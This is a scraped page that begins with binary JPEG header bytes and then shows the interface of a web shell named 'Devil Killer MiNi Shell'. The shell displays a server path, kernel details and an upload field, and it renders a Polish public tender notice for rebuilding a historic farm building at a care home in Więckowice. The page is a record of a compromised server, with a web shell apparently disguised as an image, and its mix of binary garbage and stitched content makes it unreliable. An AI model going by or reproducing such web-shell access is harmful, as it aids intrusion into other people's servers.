JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240806/0044651401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa zabytkowego budynku, magazynu gospodarczego, w Domu Pomocy Społecznej w Więckowicach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Dom Pomocy Społecznej w Więckowicach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000297922</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Słoneczna 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Więckowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-082</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">12 285 16 03</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wieckowicezam@poczta.onet.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">dpswieckowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa zabytkowego budynku, magazynu gospodarczego, w Domu Pomocy Społecznej w Więckowicach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c723115e-52ea-43de-973c-3e0701206418</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00446514</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-08-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-c723115e-52ea-43de-973c-3e0701206418 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Platforma e-zamówienia dostępna pod adresem: https://ezamowienia.gov.pl. <br/>Złożenie oferty jest wymagane tylko przez platformę https://ezamowienia.gov.pl.<br/>Po wybraniu niniejszego postępowania, udostępniane będą Specyfikacja warunków zamówienia (SWZ) i inne dokumenty zamówienia, zamieszczane przez Zamawiającego. <br/>SWZ z załącznikami dodatkowo będzie zamieszczona na stronie internetowej Zamawiającego: <br/>www.dpswieckowice.pl/zamówieniapubliczne/powyżej 130 000 zł.<br/>Dokumentacja projektowa dotycząca przedmiotu zamówienia jest również dostępna na dysku Google pod adresem:<br/>https://drive.google.com/drive/u/3/folders/1LPBixoLO4iwV-JdOn4Q4bpc82WdwsAx5</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W sprawie niniejszego postępowania korespondencja między Zamawiającym a Wykonawcami odbywa się za pomocą formularzy do komunikowania, przy użyciu platformy e-zamówienia, pod adresem: https://ezamowienia.gov.pl , po wybraniu w niniejszego postępowania. <br/>Zamawiający dopuszcza możliwość komunikowania się z nim za pomocą poczty elektronicznej adres email: wieckowicezam@poczta.onet.pl . Po otwarciu ofert Zamawiający może komunikować się z wykonawcami za pomocą poczty elektronicznej, na adresy e-mail, podane w ofertach.<br/>Zasady komunikacji elektronicznej pomiędzy Zamawiającym a wykonawcami opisane zostały w rozdziale XIII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DPS-ZP/2/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem niniejszego zamówienia jest wykonanie robót budowlanych, polegających na: „przebudowie budynku gospodarczego DPS, w Więckowicach na potrzeby biurowe administracji DPS oraz cele terapii zajęciowej mieszkańców, osób niepełnosprawnych wraz z instalacjami branżowymi”, na podstawie pozwolenia na budowę nr AB.V.1.632.2021 z dnia 11 czerwca 2021r. <br/>Etap I: roboty do wykonania w roku 2024 tj.: Roboty dodatkowe rozbiórkowe, ujawnione w trakcie pierwszego etapu robót w 2021r., demontaże i rozbiórki części ścian, wzmocnienie fundamentów ścian wewnątrz budynku, izolacja istniejących fundamentów ścian wewnątrz budynku, roboty murowe, naprawa stropów, do wykonania elementy: strop żelbetowy, posadzka na gruncie, wzmocnienie więźby dachowej, kominy, pokrycie dachowe, strop drewniany strychu, poziomy, przepusty i wpusty kanalizacyjne<br/>Etap II: do wykonania w 2025r. do 30.04.,ocieplenia ścian wewnątrz budynku, tynki, warstwy posadzkowe, piony, podejścia kanalizacyjne, rury instalacji wody ciepłej, zimnej, cyrkulacji, rury zasilające, izolacje rur instalacji centralnego ogrzewania, rozpoczęcie robót dotyczących instalacji, wykonanie instalacji odgromowej oraz rozpoczęcie wykonania instalacji elektrycznej.<br/>Pozostałe roboty przebudowy są zakresem opcji, dotyczą 2025r. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45333000-0 - Roboty instalacyjne gazowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111220-6 - Roboty w zakresie usuwania gruzu</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45223200-8 - Roboty konstrukcyjne</p> <p class="mb-0">45261100-5 - Wykonywanie konstrukcji dachowych</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45332300-6 - Roboty instalacyjne kanalizacyjne</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45333000-0 - Roboty instalacyjne gazowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Opcja dotyczy zwiększenia zakresu robót przebudowy budynku, o roboty nie będące przedmiotem I i II etapu. <br/>Maksymalny zakres robót opcji, ich rodzaje i ilości zawiera osobny przedmiar robót wyłącznie dla opcji, który jest załącznikiem do specyfikacji warunków zamówienia, nr 8, lit c.<br/>Zamawiający skorzysta z prawa opcji w odpowiedniej wielkości zakresu robót do wysokości przekazanych mu środków Powiatu Krakowskiego i PFRON w roku 2025.<br/>Zakres opcji:<br/>Renowacja, konserwacja, hydrofobizacja muru ceglanego, stolarka drzwiowa i okienna, oblicowanie, ścianki działowe, tynki , malowanie, elewacja, taras zewnętrzny, schody wejściowe oraz opaska, śmietnik, instalacje: (dokończenie) sanitarne w tym centralne ogrzewanie, instalacja elektryczna, instalacja elektryczna dodatkowa do sieci internetowej, klimatyzator, sieć komputerowa i telefoniczna, przyłącza i instalacja wody opadowej ze zbiornikami wybieralnymi.<br/>Szczegóły opcji określono w SWZ i PPU. <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-14</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kompetencje kierownika budowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność do występowania w obrocie gospodarczym;<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>Sytuacja ekonomiczna lub finansowa;<br/>1)	Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, związanej z przedmiotem zamówienia, przy czym suma gwarancyjna jest nie mniejsza niż 1 700 000 zł, tj. jeden milion siedemset tysięcy złotych<br/>2)	Wykonawca spełni warunek udziału w postępowaniu dotyczący sytuacji ekonomicznej lub finansowej, jeżeli wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 500 000,00 zł (pięćset tysięcy złotych);<br/>Zdolność techniczna lub zawodowa;<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że: <br/>1)	Dysponuje osobą zdolną do kierowania budową w związku z realizacją umowy – osoba której wykonawca powierzy funkcję kierownika budowy winna:<br/>a) posiadać uprawnienia budowlane do kierowania robotami w branży konstrukcyjno - budowlanej, bez ograniczeń,<br/>b) aktualnie przynależeć do właściwej izby samorządu zawodowego,<br/>c) posiadać kwalifikacje, o których mowa w art. 37c ustawy: o ochronie zabytków i opiece nad zabytkami z dnia 23 lipca 2003r., Dz. U. 2022, poz. 840 z późniejszymi zmianami, wg treści: robotami budowlanymi kieruje albo nadzór inwestorski wykonuje, przy zabytkach nieruchomych wpisanych do rejestru osoba, która posiada uprawnienia budowlane określone przepisami Prawa budowlanego oraz która przez co najmniej 18 miesięcy brała udział w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru lub inwentarza muzeum będącego instytucją kultury. (wymóg wg pozwolenia konserwatorskiego)<br/>d) posiadać co najmniej 3-letnie doświadczenie zawodowe;<br/>e) posiadać doświadczenie polegające na pełnieniu funkcji kierownika budowy przy realizacji co najmniej dwóch inwestycji, obejmujących roboty budowlane przy zabytkach nieruchomych, kubaturowych; <br/>2)	Dysponuje minimum jedną osobą, której będzie mógł powierzyć kierowanie robotami ogólnobudowlanymi, na potrzeby realizacji zamówienia. Osoba, której wykonawca powierzy funkcję kierowania robotami winna:<br/>a) posiadać uprawnienia budowlane do kierowania robotami w branży konstrukcyjno – budowlanej bez ograniczeń,<br/>b) aktualnie przynależeć do właściwej izby samorządu zawodowego,<br/>c) posiadać co najmniej 3-letnie doświadczenie zawodowe;<br/>d) posiadać doświadczenie tj. - brała udział w co najmniej jednej robocie budowlanej prowadzonej przy zabytkach nieruchomych, wpisanych do rejestru zabytków.<br/>UWAGA 1: Zamawiający wymaga, aby te same osoby świadczyły później usługi objęte przedmiotem umowy, z zastrzeżeniem możliwości zmiany tych osób na inne osoby, o tożsamych kompetencjach zawodowych i uprawnieniach i za zgodą Zamawiającego. Zamawiający nie dopuszcza łączenia w/w funkcji.<br/>UWAGA 2: Wykonawca winien wykazać się osobami posiadającymi uprawnienia budowlane do sprawowania samodzielnych funkcji technicznych w budownictwie, zgodnie z wymaganymi przepisami ustawy Prawo budowlane lub innymi uprawnieniami umożliwiającymi wykonywanie tych samych czynności, do wykonania których w aktualnym stanie prawnym uprawniają uprawnienia budowlane w tej samej specjalności.<br/>UWAGA 3: Zamawiający uzna za równoważne uprawnieniom wskazanym powyżej, uprawnienia tożsame wydane na podstawie wcześniej obowiązujących przepisów lub równoważne uprawnieniom w zakresie w/w, wydane w innym państwie UE, przy jednoczesnym spełnieniu wymagań określonych w ustawie z dnia 22 grudnia 2015 r. zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich <br/>Unii Europejskiej.<br/>UWAGA 4: przez „doświadczenie zawodowe” danej osoby Zamawiający rozumie posiadanie przez daną osobę, opisanych w ramach warunku uprawnień, liczonych od dnia ich uzyskania.<br/>Wykonawca posiada niezbędną zdolność techniczną popartą doświadczeniem tj:<br/>W postępowaniu mogą wziąć udział wykonawcy, którzy w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, należycie wykonali co najmniej jedną robotę budowlaną, obejmującą swoim zakresem co najmniej roboty ogólnobudowlane, instalacyjne – sanitarne oraz instalacyjne – elektryczne, w ramach budowy i/lub przebudowy i/lub remontu obiektu budowlanego stanowiącego zabytek nieruchomy, o kubaturze co najmniej 1600 m3. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed udzieleniem zamówienia, wezwie Wykonawcę, którego oferta została najwyżej oceniona do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia następujących dokumentów, potwierdzających spełnienie warunków określonych w punkcie VII SWZ:<br/>1)	Dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia, na potwierdzenie warunku określonego w punkcie VII.3 punkt 1 do SWZ.<br/>2)	Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawiona w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem, na potwierdzenie warunku określonego w punkcie VII.3 punkt 2 do SWZ<br/>3)	Wykaz robót budowlanych, wg wzoru stanowiącego zał. nr 6a do SWZ.<br/>Uwaga: Wykaz robót budowlanych, wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, potwierdzających spełnienie warunku określonego w punkcie VII.4 punkt 3) oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>4)	Wykaz danych kierownika budowy i kierownika robót, sporządzony wg wzoru stanowiącego zał. nr 6 b do SWZ.<br/>Dane osób skierowanych przez wykonawcę do pełnienia funkcji kierownika budowy, kierownika robót, oraz opis spełnienia warunków, określonych w punkcie VII.4. punkty 1) i 2) SWZ tj.:</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	Oferta, zgodnie ze wzorem załączonym do SWZ, jako załącznik nr 1 – wzór oferty<br/>2)	Kosztorysy ofertowe (dla etapu I, II i opcji) wykonawca winien sporządzić odpowiednio do zakresów w przedmiarach robót, które są załącznikami do 8 SWZ. <br/>3)	Wykonawca ubiegający się o zamówienie indywidualnie oraz każdy z wykonawców ubiegających się o zamówienie wspólnie składa: <br/>a) oświadczenie dotyczące przesłanek dotyczących wykluczenia z postępowania, w tym fakultatywnych, zgodnie z załącznikiem nr 2 do SWZ,<br/>b) oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodnie z załącznikiem nr 3 do SWZ<br/>4)	Wykonawca polegający na zasobach innych podmiotów, udostępniających mu zasoby składa oprócz oświadczeń wymienionych w punkcie 2, a i b): <br/>a) oświadczenie podmiotu udostępniającego zasoby, potwierdzającego brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie w jakim Wykonawca powołuje się na jego zasoby, zgodnie z załącznikiem nr 4 do SWZ <br/>b) do oświadczenia, o którym mowa w podpunkcie „a”, należy dołączyć zobowiązanie podmiotu udostępniającego zasoby wg wzoru stanowiącego nr 4A do SWZ.<br/>5)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, składają oświadczenie, z którego wynika jaki zakres wykonają poszczególni wykonawcy, zgodnie z załącznikiem nr 5 do SWZ.<br/>6)	Do oferty należy załączyć dowód wniesienia wadium w formie niepieniężnej, jeśli wykonawca składa wadium w takiej formie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> WADIUM wynosi 20 000 zł. <br/>1. Wadium należy wnieść przed upływem terminu składania ofert.<br/>2. Wadium w pieniądzu wnoszone jest na rachunek bankowy Domu Pomocy Społecznej w Więckowicach nr 17 1560 0013 2568 2818 2795 0004 w VeloBank SA z siedzibą w Warszawie. <br/>3.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2.<br/>4. Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. 2022 r., poz. 2080 ze zm.)<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>Pozostałe informacje w sprawie wadium zawarto w dziale XV SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> O zamówienie, na podstawie art. 58 Pzp. działają poprzez ustanowionego przez siebie pełnomocnika do złożenia oferty albo do złożenia oferty i zawarcia umowy o wykonanie robót 